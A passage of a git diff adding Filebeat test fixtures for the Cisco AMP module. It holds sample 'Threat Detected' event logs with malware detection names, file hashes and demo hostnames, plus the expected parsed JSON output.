Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
new file mode 100644
index 000000000000..1722799bd5e3
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
@@ -0,0 +1,2828 @@ +[ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196256", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 1317, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": 
"6159251512150196254", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 365000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 2642, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196253", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 
"90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 350000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 3967, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + 
"event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 5292, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": 
